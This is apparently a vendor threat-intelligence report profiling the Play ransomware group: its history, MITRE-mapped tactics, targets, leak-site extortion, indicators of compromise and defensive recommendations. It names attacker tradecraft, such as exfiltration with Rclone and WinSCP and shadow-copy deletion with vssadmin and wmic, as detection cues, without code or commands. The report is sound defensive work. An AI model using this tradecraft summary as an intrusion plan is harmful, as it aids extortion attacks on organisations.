1. Overview
Play, also known as PlayCrypt, is a financially motivated ransomware group first identified in June 2022. The group has quickly gained notoriety for its double extortion techniques, its targeting of both Windows and Linux/ESXi environments, and a unique, minimalist style of communication. Its ransom notes are often starkly simple—containing only the word “PLAY”—followed by contact details for negotiation via TOR.
Play operates a semi-closed Ransomware-as-a-Service (RaaS) model, suggesting a core team coordinates operations while partnering with trusted affiliates or deploying attacks directly. The group has conducted widespread campaigns affecting organisations across Europe, the Americas, and Asia, with a strong emphasis on government entities, legal services, finance, and manufacturing.
2. Origin and Evolution
Play was first discovered in mid-2022 during an investigation into ransomware campaigns affecting Latin American government agencies. Initial payloads bore similarities to older ransomware strains such as Hive and Quantum, suggesting that Play may have evolved from or shared development resources with former operators of those groups.
Since its emergence, Play has actively updated its tooling. It now supports full encryption of VMware ESXi environments, enabling attackers to cripple virtual infrastructure—a tactic increasingly seen in mature ransomware operations.
3. Tactics, Techniques, and Procedures (TTPs)
Play employs a broad set of intrusion tactics and demonstrates a preference for known vulnerabilities and credential-based attacks:
- Initial Access:
Exploitation of public-facing applications (T1190), brute-force and credential stuffing of RDP or VPN services (T1110), and phishing (T1566.001). - Lateral Movement:
Use of Cobalt Strike, PsExec, RDP, and scheduled tasks to move laterally (T1021, T1053). - Data Exfiltration:
Tools such as WinSCP and Rclone are used to exfiltrate sensitive files prior to encryption (T1041). - Encryption:
The ransomware uses a custom, multithreaded encryption engine that appends extensions such as.playor.PLAYCRYPT. It is capable of targeting domain controllers, file shares, and virtualised environments. - Persistence & Evasion:
Includes shadow copy deletion (T1490), process termination, registry changes (T1112), and the use of LOLBins to avoid detection.
4. Targeting Profile
Play targets a wide range of organisations with a focus on sectors likely to feel significant business impact from encryption and data leaks. Known targets include:
- Government agencies and public service portals
- Legal and financial firms with large data holdings
- Manufacturing and logistics providers
- Healthcare systems and managed service providers
Play has been active in the United Kingdom, and UK-based organisations—especially those with unpatched systems or exposed remote access points—should consider themselves at risk.
5. Notable Campaigns and Victims
Play has claimed responsibility for attacks on dozens of high-profile victims globally. Notable campaigns include:
- Attacks against multiple municipal governments in Argentina and Brazil
- A breach involving a European legal services provider, resulting in the leak of sensitive contracts and case records
- The compromise of a North American finance firm, with client data posted publicly after ransom negotiations failed
The group often withholds full data releases, choosing instead to leak incrementally to apply pressure over time.
6. Ransomware and Leak Site Behaviour
Play maintains an active dark web leak site where it publishes stolen data and victim profiles. Its extortion model typically involves:
- Data exfiltration before encryption
- Deployment of ransomware across the victim’s estate
- A ransom note containing only the word “PLAY” and TOR-based contact details
- Staged publication of data on its leak site if payment is not made
Play’s leak site is updated frequently and often includes government, legal, and private sector entities. Their communication style is direct, and they frequently offer proofs-of-compromise during initial contact.
7. Technical Indicators
Common indicators of compromise (IOCs) associated with Play include:
- File extensions:
.play,.PLAYCRYPT, or.PLAY - Use of
rclone.exeandwinscp.exefor data exfiltration - Creation of scheduled tasks for payload execution
- Deletion of shadow copies using
vssadminandwmic - Outbound connections to command-and-control nodes hosted in Eastern Europe and Southeast Asia
YARA rules and detection logic are available to UK Cyber Defence Ltd clients upon request.
8. Defensive Measures and Recommendations
To reduce risk from Play ransomware, organisations should:
- Apply patches for known exploited vulnerabilities, especially Exchange Server and VPN gateways
- Enforce multi-factor authentication (MFA) for all external access
- Monitor for use of PsExec, RDP, and PowerShell by non-administrators
- Maintain offline backups and verify restoration processes regularly
- Implement network segmentation, especially around domain controllers and storage clusters
- Conduct employee phishing awareness training
9. Attribution and Alliances
There is currently no public evidence linking Play to a nation-state. However, overlap in techniques and code suggests that some of its operators may have previously worked with groups such as Hive or Conti.
Play’s infrastructure, leak site architecture, and negotiation portals demonstrate a high level of operational discipline, likely indicating a core team supported by experienced affiliates.
10. Conclusion
Play is a fast-maturing ransomware threat with clear intent to disrupt, extort, and scale. Its support for cross-platform environments, strategic targeting, and silent operational tempo place it firmly among the most significant ransomware groups active today. UK organisations—especially in legal, financial, and public sectors—should treat Play as a credible and persistent threat requiring continuous defensive readiness.
Author:
Threat Intelligence Team, UK Cyber Defence Ltd
All intelligence current as of May 2025
